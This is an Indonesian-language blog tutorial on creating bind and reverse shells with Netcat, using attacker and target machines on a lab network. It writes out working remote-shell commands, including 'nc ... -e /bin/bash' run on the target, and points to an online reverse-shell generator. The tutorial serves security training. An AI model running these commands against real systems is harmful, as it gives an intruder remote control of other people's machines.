Cara Membuat Bind dan Reverse Shell Menggunakan Netcat - Pintar Network

Latest

Pintar Network merupakan sebuah website yang berisi informasi serta tutorial seputar IT, Network, System, dan Security.


Senin, 31 Oktober 2022

Cara Membuat Bind dan Reverse Shell Menggunakan Netcat

 Cara Membuat Bind dan Reverse Shell Menggunakan Netcat


Assalamu'alaikum wr.wb

Kelanjutan dari materi sebelumnya yaitu Mengenal Bind dan Reverse Shell. Kali ini, Saya akan membagikan tips bagaimana cara membuat Bind dan Reverse Shell menggunakan tool yang bernama Netcat.

Untuk menggunakan tool Netcat, kita hanya perlu menuliskan perintah nc disertai dengan switch yang dibutuhkan. Berikut ini adalah switch atau argument yang ada pada Netcat:
 
Switch pada netcat
 
Oke langsung saja, berikut adalah langkah-langkahnya:

Bind Shell

1. Sesuai dengan penjelasan pada materi sebelumnya. Untuk membuat bind shell, kita perlu untuk membuat mesin target listening pada port tertentu serta membawa sebuah shell. Oleh karena itu, jalankan perintah berikut pada terminal target:

nc -lnvp 4444 -e /bin/bash

 

*Note: Ubah port sesuai dengan keinginan

 

2. Setelah mesin target listening pada port tertentu dengan membawa sebuah shell, kita hanya perlu menjalankan perintah berikut pada mesin attacker untuk melakukan koneksi ke mesin target dan mendapatkan shell:

 

nc 10.0.2.15 4444

 

*Note: Sesuaikan IP nya menjadi IP milik target


Berikut adalah contoh tampilan yang ada pada terminal setelah menjalankan kedua perintah tersebut:

Terminal target:

Tampilan terminal target

Terminal attacker:

Tampilan terminal attacker

 

Dari gambar diatas dapat dilihat bahwa attacker berhasil mendapatkan shell dari target.


Reverse Shell


1. Untuk membuat sebuah reverse shell, pertama kita perlu untuk menjalankan perintah berikut pada terminal attacker untuk membuat mesin attacker listening pada port tertentu:

 

nc -lnvp 4444

 

*Note: Ubah port sesuai dengan keinginan


2. Selanjutnya, jalankan perintah berikut pada terminal target untuk membuat target terhubung dengan attacker dan attacker mendapatkan sebuah shell dari target:

 

nc 10.0.2.15 4444 -e /bin/bash

 

*Note: Sesuaikan IP nya menjadi IP milik attacker


Berikut adalah contoh tampilan yang ada pada terminal setelah menjalankan kedua perintah tersebut:

Terminal target:

Tampilan terminal target 2

Terminal attacker:

Tampilan terminal attacker 2
 

Dari gambar diatas dapat dilihat bahwa attacker berhasil mendapatkan shell dari target.

 

Selain menggunakan Netcat, kita juga dapat menggunakan tool-tool lain untuk membuat reverse shell.

Berikut ini Saya lampirkan link sebuah website yang menyediakan tool untuk men-generete syntax untuk membuat reverse shell:

Berikut ini adalah tampilan website nya:

Online - Reverse Shell Generator

Nah itu tadi langkah-langkah untuk membuat bind dan reverse shell menggunakan Netcat.

Sekian yang dapat Saya sampaikan. Apabila ada yang ingin kalian tanyakan, silakan tulis di kolom komentar di bawah ini. Terima kasih

Wassalamu'alaikum wr.wb

Tidak ada komentar:

Posting Komentar